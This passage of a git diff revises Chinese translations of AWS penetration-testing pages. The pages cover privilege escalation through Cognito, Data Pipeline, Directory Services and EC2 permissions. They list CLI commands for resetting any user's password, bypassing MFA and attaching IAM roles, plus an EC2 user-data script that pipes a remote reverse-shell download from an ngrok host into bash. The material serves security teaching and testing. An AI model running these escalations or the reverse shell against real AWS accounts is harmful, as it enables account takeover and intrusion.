aws cognito-identity update-identity-pool \
--identity-pool-id \
@@ -88,11 +88,11 @@ aws cognito-idp admin-add-user-to-group \
```bash
aws cognito-idp create-group --group-name Hacked --user-pool-id --role-arn
```
-**潜在影响:** 提升到其他Cognito IAM角色。
+**潜在影响:** 提升到其他 Cognito IAM 角色。
### `cognito-idp:AdminConfirmSignUp`
-此权限允许**验证注册**。默认情况下,任何人都可以登录Cognito应用程序,如果不加以限制,用户可以使用任何数据创建帐户并通过此权限进行验证。
+此权限允许**验证注册**。默认情况下,任何人都可以登录 Cognito 应用程序,如果不加以限制,用户可以使用任何数据创建帐户并通过此权限进行验证。
```bash
aws cognito-idp admin-confirm-sign-up \
--user-pool-id \
@@ -115,13 +115,13 @@ aws cognito-idp admin-create-user \
### `cognito-idp:AdminEnableUser`
-此权限可以在非常边缘的情况下提供帮助,攻击者发现了一个禁用用户的凭证,并且他需要**再次启用它**。
+此权限可以在非常边缘的情况下提供帮助,攻击者发现了一个禁用用户的凭证,并且他需要**重新启用它**。
```bash
aws cognito-idp admin-enable-user \
--user-pool-id \
--username
```
-**潜在影响:** 间接提升到身份池 IAM 角色的权限,适用于经过身份验证的用户和用户的权限,如果攻击者拥有禁用用户的凭证。
+**潜在影响:** 间接提升对身份池 IAM 角色的权限,适用于经过身份验证的用户和用户的权限,如果攻击者拥有禁用用户的凭证。
### `cognito-idp:AdminInitiateAuth`, **`cognito-idp:AdminRespondToAuthChallenge`**
@@ -129,7 +129,7 @@ aws cognito-idp admin-enable-user \
### `cognito-idp:AdminSetUserPassword`
-此权限将允许攻击者 **更改任何用户的密码**,使其能够冒充任何用户(不启用 MFA 的用户)。
+此权限将允许攻击者 **更改任何用户的密码**,使其能够冒充任何用户(未启用 MFA 的用户)。
```bash
aws cognito-idp admin-set-user-password \
--user-pool-id \
@@ -137,7 +137,7 @@ aws cognito-idp admin-set-user-password \
--password \
--permanent
```
-**潜在影响:** 直接的权限提升,可能影响任何用户,因此可以访问每个用户所属于的所有组以及访问身份池认证的 IAM 角色。
+**潜在影响:** 直接的权限提升可能影响任何用户,因此可以访问每个用户所属于的所有组以及访问身份池认证的 IAM 角色。
### `cognito-idp:AdminSetUserSettings` | `cognito-idp:SetUserMFAPreference` | `cognito-idp:SetUserPoolMfaConfig` | `cognito-idp:UpdateUserPool`
@@ -156,7 +156,7 @@ aws cognito-idp admin-set-user-mfa-preference \
--username \
--user-pool-id
```
-**SetUserPoolMfaConfig**: 类似于前一个权限,此权限可用于设置用户池的 MFA 首选项,以绕过 MFA 保护。
+**SetUserPoolMfaConfig**: 类似于前一个权限,此权限可用于设置用户池的 MFA 偏好,以绕过 MFA 保护。
```bash
aws cognito-idp set-user-pool-mfa-config \
--user-pool-id \
@@ -164,7 +164,7 @@ aws cognito-idp set-user-pool-mfa-config \
[--software-token-mfa-configuration ] \
[--mfa-configuration ]
```
-**UpdateUserPool:** 也可以更新用户池以更改 MFA 策略。 [在这里查看 cli](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html)。
+**UpdateUserPool:** 也可以更新用户池以更改 MFA 策略。 [Check cli here](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html)。
**Potential Impact:** 间接的权限提升,可能针对攻击者知道凭据的任何用户,这可能允许绕过 MFA 保护。
@@ -178,13 +178,13 @@ aws cognito-idp admin-update-user-attributes \
--username \
--user-attributes
```
-**潜在影响:** 在使用 Cognito 用户池的基础应用程序中,可能会间接提升权限,基于用户属性授予权限。
+**潜在影响:** 通过使用 Cognito 用户池在基础应用程序中可能间接提升权限,基于用户属性授予权限。
### `cognito-idp:CreateUserPoolClient` | `cognito-idp:UpdateUserPoolClient`
-拥有此权限的攻击者可以**创建一个新的用户池客户端,其限制低于**现有的池客户端。例如,新的客户端可以允许任何类型的方法进行身份验证,没有任何秘密,禁用令牌撤销,允许令牌有效期更长...
+拥有此权限的攻击者可以**创建一个比现有用户池客户端限制更少的新用户池客户端**。例如,新客户端可以允许任何类型的方法进行身份验证,没有任何密钥,禁用令牌撤销,允许令牌有效期更长...
-如果不是创建一个新客户端,而是**修改现有客户端**,也可以做到这一点。
+如果不是创建新客户端,而是**修改现有客户端**,也可以做到这一点。
在 [**命令行**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html)(或 [**更新命令**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html))中,您可以查看所有选项,检查一下!
```bash
@@ -193,7 +193,7 @@ aws cognito-idp create-user-pool-client \
--client-name \
[...]
```
-**潜在影响:** 通过创建一个放宽安全措施的新客户端,可能间接导致对用户池使用的身份池授权用户的权限提升,使攻击者能够使用他能够创建的用户登录。
+**潜在影响:** 通过创建一个放宽安全措施的新客户端,可能间接提升对用户池使用的身份池授权用户的权限,使攻击者能够使用他能够创建的用户登录。
### `cognito-idp:CreateUserImportJob` | `cognito-idp:StartUserImportJob`
@@ -214,13 +214,13 @@ aws cognito-idp start-user-import-job \
curl -v -T "PATH_TO_CSV_FILE" \
-H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL"
```
-(在创建新导入作业的情况下,您可能还需要 iam passrole 权限,我还没有测试过)。
+(在您创建新的导入作业的情况下,您可能还需要 iam passrole 权限,我还没有测试过)。
-**潜在影响:** 直接提升到经过身份验证的用户的身份池 IAM 角色。间接提升到其他应用功能,能够创建任何用户。
+**潜在影响:** 直接提升权限到身份池 IAM 角色,适用于经过身份验证的用户。间接提升权限到其他应用功能,能够创建任何用户。
### `cognito-idp:CreateIdentityProvider` | `cognito-idp:UpdateIdentityProvider`
-攻击者可以创建一个新的身份提供者,从而能够通过该提供者**登录**。
+攻击者可以创建一个新的身份提供者,从而能够**通过该提供者登录**。
```bash
aws cognito-idp create-identity-provider \
--user-pool-id \
@@ -230,20 +230,20 @@ aws cognito-idp create-identity-provider \
[--attribute-mapping ] \
[--idp-identifiers ]
```
-**潜在影响:** 直接提升到经过身份验证的用户的身份池 IAM 角色。间接提升到其他应用功能,能够创建任何用户。
+**潜在影响:** 直接提升到身份池 IAM 角色的认证用户。间接提升到其他应用功能,能够创建任何用户。
### cognito-sync:\* 分析
-这是 Cognito 身份池角色中默认的非常常见的权限。即使权限中的通配符看起来总是不好(特别是来自 AWS),**给定的权限从攻击者的角度来看并不是特别有用**。
+这是 Cognito 身份池角色中默认的非常常见的权限。即使权限中的通配符看起来总是不好(特别是来自 AWS),**给定的权限从攻击者的角度来看并不是非常有用**。
此权限允许读取身份池和身份池内身份 ID 的使用信息(这不是敏感信息)。\
身份 ID 可能有 [**数据集**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) 分配给它们,这些是会话的信息(AWS 将其定义为 **保存的游戏**)。这可能包含某种敏感信息(但概率相当低)。您可以在 [**枚举页面**](../aws-services/aws-cognito-enum/) 找到如何访问这些信息。
-攻击者还可以使用这些权限来 **注册自己到一个 Cognito 流,以发布这些数据集上的更改** 或 **在 Cognito 事件上触发的 Lambda**。我没有看到过这种用法,我也不期望这里有敏感信息,但这并不是不可能的。
+攻击者还可以使用这些权限来 **注册自己到一个发布这些数据集更改的 Cognito 流** 或 **在 Cognito 事件上触发的 lambda**。我没有见过这种用法,我也不期望这里有敏感信息,但这并不是不可能的。
### 自动化工具
-- [Pacu](https://github.com/RhinoSecurityLabs/pacu),AWS 利用框架,现在包括 "cognito\_\_enum" 和 "cognito\_\_attack" 模块,这些模块自动枚举账户中的所有 Cognito 资产并标记弱配置、用于访问控制的用户属性等,同时还自动创建用户(包括 MFA 支持)和基于可修改自定义属性、可用身份池凭证、可假设角色的 ID 令牌等的权限提升。
+- [Pacu](https://github.com/RhinoSecurityLabs/pacu),AWS 利用框架,现在包括 "cognito\_\_enum" 和 "cognito\_\_attack" 模块,这些模块自动枚举账户中的所有 Cognito 资产并标记弱配置、用于访问控制的用户属性等,同时还自动创建用户(包括 MFA 支持)和基于可修改自定义属性、可用身份池凭证、可假设角色的权限提升等。
有关模块功能的描述,请参见 [博客文章](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2) 的第 2 部分。有关安装说明,请参见主 [Pacu](https://github.com/RhinoSecurityLabs/pacu) 页面。
@@ -259,7 +259,7 @@ us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
```bash
Pacu (new:test) > run cognito__enum
```
-- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) 是一个用 Python 编写的 CLI 工具,实施对 Cognito 的不同攻击,包括权限提升。
+- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) 是一个用 Python 实现的 CLI 工具,针对 Cognito 实施不同的攻击,包括权限提升。
#### 安装
```bash
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md
index 61789404d..2b8ab1038 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md
@@ -4,7 +4,7 @@
## datapipeline
-有关datapipeline的更多信息,请查看:
+有关 datapipeline 的更多信息,请查看:
{{#ref}}
../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
@@ -12,7 +12,7 @@
### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`
-具有这些**权限的用户可以通过创建数据管道来提升权限**,以使用**分配角色的权限执行任意命令:**
+具有这些 **权限的用户可以通过创建数据管道来提升权限**,以使用 **分配角色的权限执行任意命令:**
```bash
aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
```
@@ -50,18 +50,18 @@ aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
}
```
> [!NOTE]
-> 请注意,**第14、15和27行**中的**角色**需要是**可由datapipeline.amazonaws.com假设的角色**,而**第28行**中的角色需要是**可由ec2.amazonaws.com假设的角色,并且具有EC2配置文件实例**。
+> 请注意,**第14、15和27行**中的**角色**需要是**可被datapipeline.amazonaws.com假设的角色**,而**第28行**中的角色需要是**可被ec2.amazonaws.com假设的角色,并且具有EC2配置文件实例**。
>
-> 此外,EC2实例将仅能访问可由EC2实例假设的角色(因此您只能窃取那个角色)。
+> 此外,EC2实例将仅能访问可被EC2实例假设的角色(因此您只能窃取那个角色)。
```bash
aws datapipeline put-pipeline-definition --pipeline-id \
--pipeline-definition file:///pipeline/definition.json
```
-**攻击者制作的** pipeline definition file **包含执行命令或通过 AWS API 创建资源的指令,利用 Data Pipeline 的角色权限来潜在地获得额外的权限。**
+**攻击者制作的管道定义文件包含执行命令或通过 AWS API 创建资源的指令**,利用数据管道的角色权限来潜在地获得额外的特权。
**潜在影响:** 直接提升到指定的 ec2 服务角色。
-## References
+## 参考
- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md
index 7e03bf49e..b866d03f4 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md
@@ -19,7 +19,7 @@ aws ds reset-user-password --directory-id --user-name Admin --new-password
```
### AWS Management Console
-可以启用一个 **应用访问 URL**,让 AD 用户可以登录:
+可以启用一个 **应用访问 URL**,供 AD 用户登录:
.png)
--instance-type t2.micro \
--iam-instance-profile Name= --key-name \
@@ -24,7 +24,7 @@ aws ec2 run-instances --image-id --instance-type t2.micro \
```
- **通过用户数据访问 rev shell**
-您可以使用 **用户数据** (`--user-data`) 启动一个新实例,该实例将向您发送一个 **rev shell**。您不需要以这种方式指定安全组。
+您可以使用 **用户数据** (`--user-data`) 运行一个新实例,该实例将向您发送一个 **rev shell**。您不需要以这种方式指定安全组。
```bash
echo '#!/bin/bash
curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh
@@ -34,7 +34,7 @@ aws ec2 run-instances --image-id --instance-type t2.micro \
--count 1 \
--user-data "file:///tmp/rev.sh"
```
-注意,如果您在实例外部使用 IAM 角色的凭据,请小心 GuradDuty:
+小心使用实例外的 IAM 角色凭证时的 GuradDuty:
{{#ref}}
../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
@@ -65,7 +65,7 @@ echo ECS_CLUSTER= >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >>
aws-ecs-privesc.md
{{#endref}}
-如果您**无法创建新实例**但拥有权限 `ecs:RegisterContainerInstance`,您可能能够在集群中注册该实例并执行评论攻击。
+如果您**无法创建新实例**但拥有权限 `ecs:RegisterContainerInstance`,您可能能够在集群中注册该实例并执行评论中的攻击。
**潜在影响:** 直接提升到附加到任务的 ECS 角色。
@@ -80,13 +80,13 @@ aws iam remove-role-from-instance-profile --instance-profile-name --role-
# Add role to instance profile
aws iam add-role-to-instance-profile --instance-profile-name --role-name
```
-如果**实例配置文件有角色**且攻击者**无法移除它**,还有另一种变通方法。他可以**找到**一个**没有角色的实例配置文件**或**创建一个新的**(`iam:CreateInstanceProfile`),**将**该**角色**添加到该**实例配置文件**(如前所述),并**将实例配置文件**关联到一个被攻陷的**实例:**
+如果**实例配置文件有角色**且攻击者**无法移除它**,还有另一种变通方法。他可以**找到**一个**没有角色的实例配置文件**或**创建一个新的**(`iam:CreateInstanceProfile`),**将**角色**添加**到该**实例配置文件**(如前所述),并**将实例配置文件**关联到一个被攻陷的**实例:**
- 如果实例**没有任何实例**配置文件(`ec2:AssociateIamInstanceProfile`)\*
```bash
aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id
```
-**潜在影响:** 直接提升权限到不同的 EC2 角色(你需要已经攻陷一个 AWS EC2 实例,并且拥有一些额外的权限或特定的实例配置文件状态)。
+**潜在影响:** 直接提升权限到不同的 EC2 角色(你需要已经攻陷一个 AWS EC2 实例并且拥有一些额外的权限或特定的实例配置文件状态)。
### **`iam:PassRole`((** `ec2:AssociateIamInstanceProfile`& `ec2:DisassociateIamInstanceProfile`) || `ec2:ReplaceIamInstanceProfileAssociation`)
@@ -104,11 +104,11 @@ aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --ins
aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name= --association-id 